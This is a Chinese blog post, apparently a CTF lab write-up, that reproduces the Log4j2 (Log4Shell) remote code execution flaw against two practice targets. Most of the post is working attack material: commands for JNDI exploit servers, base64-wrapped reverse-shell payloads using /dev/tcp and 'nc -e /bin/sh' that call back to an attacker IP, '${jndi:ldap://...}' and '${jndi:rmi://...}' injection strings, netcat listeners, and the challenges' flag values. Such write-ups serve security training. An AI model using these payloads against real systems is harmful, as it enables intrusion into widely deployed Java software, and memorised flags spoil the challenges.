Log4j2_RCE漏洞复现
2021-12-16 18:03:00

Log4j2_RCE漏洞复现

这里是用了两种工具来复现漏洞

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法

靶机地址:http://vulfocus.fofa.so/

工具地址:https://www.lanzoup.com/imeONxo55if
密码:Le1a

1639648458228.png

访问靶机地址

1639648481317.png

先把 工具上传到VPS上,然后运行

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(bash -i >& /dev/tcp/IP/12345 0>&1)的base64编码}|{base64,-d}|{bash,-i}" -A "IP"

1639648064663.png

然后新开一个终端用于监听端口nc -lnvp 12345

1639648129761.png

然后POST发送payload="${jndi:rmi://IP:1099/z1il2b}" 这个payload在上面运行工具的时候,工具返回过exp地址

1639648242051.png

收到反弹的shell

1639648307233.png

用find命令找一下flag

1
find / -name "fla*"

1639648412584.png

得到flag:

1
flag-{bmh86002b42-ca61-4daf-96b5-658d2c29ef09}

JNDIExploit-1.2-SNAPSHOT.jar方法:

靶机地址:https://ctf.bugku.com/challenges/detail/id/340.html

工具地址:https://www.lanzoup.com/i8Aa4xo5gmf

密码:Le1a

先把 工具上传到VPS上,然后运行java -jar JNDIExploit-1.2-SNAPSHOT.jar -i IP -p 8080

1639647486706.png

然后另开 一个终端用来监听端口 nc -lnvp 12345

1639647542111.png

然后在用户名处填写${jndi:ldap://IP/Basic/Command/Base64/(nc IP 12345 -e /bin/sh)的base64编码}密码随便填

1639648834168.png

1639648858048.png

收到反弹的shell,直接cat /flag

1639648895321.png

得到flag:

1
flag{7a44f8fd04f1ba84e7a8afcf6f4c4706}
上一页
2021-12-16 18:03:00
下一页